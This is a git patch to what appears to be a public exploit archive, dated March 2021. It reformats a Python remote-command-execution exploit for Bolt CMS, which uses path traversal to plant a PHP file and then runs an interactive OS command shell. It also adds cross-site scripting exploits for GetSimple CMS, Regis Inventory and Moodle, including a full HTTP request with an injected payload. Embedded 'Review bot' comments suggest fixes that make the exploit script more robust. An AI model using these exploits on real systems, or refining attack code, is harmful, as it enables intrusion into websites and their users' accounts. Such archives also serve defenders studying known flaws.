From 95de3ffa8480c6e2ca966aa685a19e6eb4fcd1b9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 27 Mar 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-03-27 4 changes to exploits/shellcodes GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS Moodle 3.10.3 - 'label' Persistent Cross Site Scripting --- exploits/php/webapps/48296.py | 149 ++++++++++++++------------------ exploits/php/webapps/49712.html | 21 +++++ exploits/php/webapps/49713.txt | 22 +++++ exploits/php/webapps/49714.txt | 50 +++++++++++ files_exploits.csv | 3 + 5 files changed, 159 insertions(+), 86 deletions(-) create mode 100644 exploits/php/webapps/49712.html create mode 100644 exploits/php/webapps/49713.txt create mode 100644 exploits/php/webapps/49714.txt diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py index 9b3401a53..affcf1865 100755 --- a/exploits/php/webapps/48296.py +++ b/exploits/php/webapps/48296.py @@ -7,11 +7,6 @@ # Tested on: Linux # CVE : not-yet-0day -# last version - -# p0c - - #!/usr/bin/python import requests 
@@ -20,37 +15,26 @@ import warnings import re import os from bs4 import BeautifulSoup -from colorama import init -from termcolor import colored - -init() - +from colorama import init +from termcolor import colored + +init() +#pip install -r requirements.txt print(colored(''' - ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ - ▄▄▄▄▄▄▄▄▄▄▄ -▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ -▐░░▌▐░░░░░░░░░░░▌ -▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ -▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ -▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ -▐░▌▐░▌▐░▌ -▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ -▐░▌▐░█▄▄▄▄▄▄▄▄▄ -▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ - ▐░▌▐░░░░░░░░░░░▌ -▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ -▀▀▀▀▀▀▀▀▀█░▌ -▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ - ▐░ -▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ -▄▄▄▄▄▄▄▄▄█░▌ -▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ -▐░▌▐░░░░░░░░░░░▌ - ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ - ▀▀▀▀▀▀▀▀▀▀▀ + ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ ▐░░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ +▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░ +▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ + ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ Pre Auth rce with low credintanl -By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) +#Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) 
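Review bot: The new comment `#pip install -r requirements.txt` above the banner points at a requirements file that this commit does not add (the diffstat lists only the four exploit files and the CSV), so a reader cannot act on it. The imports a few lines up already name every third-party package, so a self-contained line is more useful, e.g. `# Requires: requests, beautifulsoup4, colorama, termcolor` followed by `# pip install requests beautifulsoup4 colorama termcolor`. The rest of the hunk only re-joins the banner lines and reorders the `colorama`/`termcolor` imports, which changes nothing at runtime.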
@@ -65,8 +49,7 @@ password = sys.argv[3] request = requests.session() -print((colored("[+] Retrieving CSRF token to submit the login -form","green"))) +print((colored("[+] Retrieving CSRF token to submit the login form","green"))) page = request.get(url+"/bolt/login") html_content = page.text soup = BeautifulSoup(html_content, 'html.parser') @@ -87,15 +70,15 @@ print((colored("[+] Login token is : {0}","green")).format(token)) aaa = request.get(url+"/bolt/profile") soup0 = BeautifulSoup(aaa.content, 'html.parser') token0 = soup0.findAll('input')[6].get("value") -data_profile = { -"user_profile[password][first]":"password", -"user_profile[password][second]":"password", -"user_profile[email]":"a@a.com", -"user_profile[displayname]":"", -"user_profile[save]":"", -"user_profile[_token]":token0 +data_profile = { + "user_profile[password][first]":"password", + "user_profile[password][second]":"password", + "user_profile[email]":"a@a.com", + "user_profile[displayname]":"", + "user_profile[save]":"", + "user_profile[_token]":token0 -} + } profile = request.post(url+'/bolt/profile',data_profile) 
@@ -113,55 +96,49 @@ tables = soup2.find_all('span', class_ = 'entry disabled') print((colored("[+] SESSION INJECTION ","green"))) -for all_tables in tables: - -f= open("session.txt","a+") -f.write(all_tables.text+"\n") -f.close() -num_lines = sum(1 for line in open('session.txt')) - -renamePostData = { -"namespace": "root", -"parent": "/app/cache/.sessions", -"oldname": all_tables.text, -"newname": "../../../public/files/test{}.php".format(num_lines), -"token": csrf - } -rename = request.post(url+"/async/folder/rename", renamePostData) +for all_tables in tables: + + f= open("session.txt","a+") + f.write(all_tables.text+"\n") + f.close() + num_lines = sum(1 for line in open('session.txt')) + + renamePostData = { + "namespace": "root", + "parent": "/app/cache/.sessions", + "oldname": all_tables.text, + "newname": "../../../public/files/test{}.php".format(num_lines), + "token": csrf + } + rename = request.post(url+"/async/folder/rename", renamePostData) + + try: + url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) -try: -url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) - -rev = requests.get(url1).text -r1 = re.findall('php',rev) - -r2 = r1[0] -if r2 == "php" : -fileINJ = "test{}".format(num_lines) - -print((colored("[+] FOUND : "+fileINJ,"green"))) - -except IndexError: -print((colored("[-] Not found.","red"))) + rev = requests.get(url1).text + r1 = re.findall('php',rev) + + r2 = r1[0] + if r2 == "php" : + fileINJ = "test{}".format(num_lines) + + print((colored("[+] FOUND : "+fileINJ,"green"))) + + except IndexError: + print((colored("[-] Not found.","red"))) new_name = 0 while new_name != 'quit': -inputs = input(colored("Enter OS command , for exit 'quit' : -","green","on_red")) -if inputs == "quit" : -exit() -else: -a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) -aa = a.text -r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) + inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red")) + 
if inputs == "quit" : + exit() + else: + a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) + aa = a.text + r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) -print((r11)[0]) - - - - -Greetz to : all my friends \ No newline at end of file + print((r11)[0]) \ No newline at end of file diff --git a/exploits/php/webapps/49712.html b/exploits/php/webapps/49712.html new file mode 100644 index 000000000..365f49e08 --- /dev/null +++ b/exploits/php/webapps/49712.html @@ -0,0 +1,21 @@ +# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS +# Exploit Author: Abhishek Joshi +# Date: March 25, 2021 +# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download +# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip +# Version: 0.1 +# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10 +# Tested against: Firefox 78.7.0esr (64-bit) + +# Vulnerability Description: +# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site. + +## CSRF POST Form Method + +
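Review bot: `num_lines = sum(1 for line in open('session.txt'))` in the re-indented `for` loop opens the file without ever closing it, leaving a handle to the garbage collector on every iteration; the idiomatic form is `with open('session.txt') as fh: num_lines = sum(1 for _ in fh)`. Further down, `fileINJ` is bound only inside the `try` when the `php` marker is found, so if every iteration takes the `except IndexError` branch the later `requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))` fails with `NameError` instead of a clear "nothing found" message; initialising `fileINJ = None` before the loop and checking it before entering the `while` makes that failure explicit. The pattern `'...displayname";s:..:"([\w\s\W]+)'` is a plain string containing `\w` and `\s`, which Python flags as invalid escapes; it should be a raw string `r'...'`. Both the `for` loop and the `while` loop lie entirely within this hunk.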
+ + + + +
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49713.txt b/exploits/php/webapps/49713.txt
new file mode 100644
index 000000000..4afa1075c
--- /dev/null
+++ b/exploits/php/webapps/49713.txt
@@ -0,0 +1,22 @@
+# Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS
+# Exploit Author: George Tsimpidas
+# Date: 2021-03-25
+# Vendor Homepage: www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip
+# Version : 1.0.0
+# Tested on: Kali Linux 2020.4
+# Category: Webapp
+
+# Description
+
+Regis Inventory And Monitoring System, suffers from a stored cross site scripting on Item's List Category
+
+#PoC
+
+1. Login as admin : http://localhost/regis_inventory/index.php
+2. Visit : http://localhost/regis_inventory/item.php
+3. Click add a New Item and input your payload on "Generic Name" textbox.
+
+Payload : 
+
+4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up
\ No newline at end of file
diff --git a/exploits/php/webapps/49714.txt b/exploits/php/webapps/49714.txt
new file mode 100644
index 000000000..7333c0d2e
--- /dev/null
+++ b/exploits/php/webapps/49714.txt
@@ -0,0 +1,50 @@ +# Exploit Title: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting +# Date: 25.03.2021 +# Author: Vincent666 ibn Winnie +# Software Link: https://moodle.org/ +# Tested on: Windows 10 +# Web Browser: Mozilla Firefox +# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month + +Choose a role : Student (example) +Open calendar : +https://school.localhost/calendar/view.php?view=month + +Create new event: +Example: +Event Title "Test" +Description :Choose Insert Video File and choose Video: +Video Source Url you can paste video link from youtube + +And open Subtitles and Captions: +Subtitle track URL use video link from youtube +Field Label : There is we can use xss code: + + + +or try in base64 + + + +Insert Media and save this. +Open event and get stored xss. + +POST: + +https://school.localhost/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form +Host: school.localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate, br +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Content-Length: 996 +Origin: https://school.localhost +Connection: keep-alive +Referer: https://school.localhost/calendar/view.php?view=month +Cookie: MoodleSession=4ea0036558425526decc096ed375b886; +EU_COOKIE_LAW_CONSENT=true + 
+[{"index":0,"methodname":"core_calendar_submit_create_update_form","args":{"formdata":"id=0&userid=56&modulename=&instance=0&visible=1&eventtype=user&sesskey=vCHlHS7oIl&_qf__core_calendar_local_event_forms_create=1&mform_showmore_id_general=1&name=test×tart%5Bday%5D=25×tart%5Bmonth%5D=3×tart%5Byear%5D=2021×tart%5Bhour%5D=10×tart%5Bminute%5D=4&description%5Btext%5D=%3Cp%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%3E%26nbsp%3B%3Cvideo%20controls%3D%22true%22%3E%3Csource%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%3E%3Ctrack%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%20kind%3D%22subtitles%22%20srclang%3D%22en%22%20label%3D%22%3Cimg%20src%3D%26quot%3B1%26quot%3B%20onerror%3D%26quot%3Balert(1)%26quot%3B%20%2F%3E%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%3C%2Fvideo%3E%26nbsp%3B%3Cbr%3E%3C%2Fp%3E&description%5Bformat%5D=1&description%5Bitemid%5D=495874277&location=&duration=0"}}] \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4bad37e64..98edaeb89 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -43892,4 +43892,7 @@ id,file,description,date,author,type,platform,port
 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware,
 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware,
 49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",2021-03-25,"Andrea Gonzalez",webapps,php,
+49712,exploits/php/webapps/49712.html,"GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS",2021-03-26,"Abhishek Joshi",webapps,php,
+49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS",2021-03-26,"George Tsimpidas",webapps,php,
+49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",2021-03-26,Vincent666,webapps,php,
 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,